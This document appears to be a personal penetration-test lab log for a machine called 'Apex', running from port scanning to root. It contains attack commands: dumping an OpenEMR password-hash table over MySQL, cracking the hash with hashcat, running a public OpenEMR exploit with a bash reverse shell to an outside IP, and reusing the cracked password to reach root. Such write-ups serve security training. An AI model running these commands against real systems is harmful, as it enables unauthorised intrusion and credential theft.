🧪 Pentest Log: {{date:2025-07-25}}

🔍 Target Information

• Machine Name: Apex
• IP Address: 192.168.222.145
• Operating System: Linux

ip=192.168.222.145

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

dirsearch -u http://$ip/openemr -r -o dirsearch.txt

TeamCity Professional 2023.05.4

Port 445

smbclient -L \\\\$ip\\

mget *

Port 3306

mysql -u username -p -h $ip --skip-ssl-verify-server-cert


use openemr;

select * from users_secure;

found the admin password hash

$2a$05$bJcIfCBjN5Fuh0K9qfoe0eRJqMdM49sWvuSGqv84VMMAkLgkK8XnC

💣 Exploitation / Foothold

Tool / Script Used:

Hashcat

crack the hash using hashcat

hashcat -m 3200 'hash.txt' '/home/kali/Documents/oscp/rockyou.txt' --force

admin:thedoctor

https://www.exploit-db.com/exploits/45161

searchsploit -m 45161


python2 45161.py http://$ip/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.45.163/1337 0>&1'

nc -lvnp 1337

🧬 Privilege Escalation

👤 Current Access

• User: www-data
• Groups: www-data
• Shell Type: webshell

🔍 Enumeration

SUID:

**find / -type f -perm -4000 2>/dev/null**

found the /bin/su

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Password Reuse
• Target Binary/Service: su
• Reference / Source: N/A

🔧 Exploit Steps

• Smash to root

su

password:thedoctor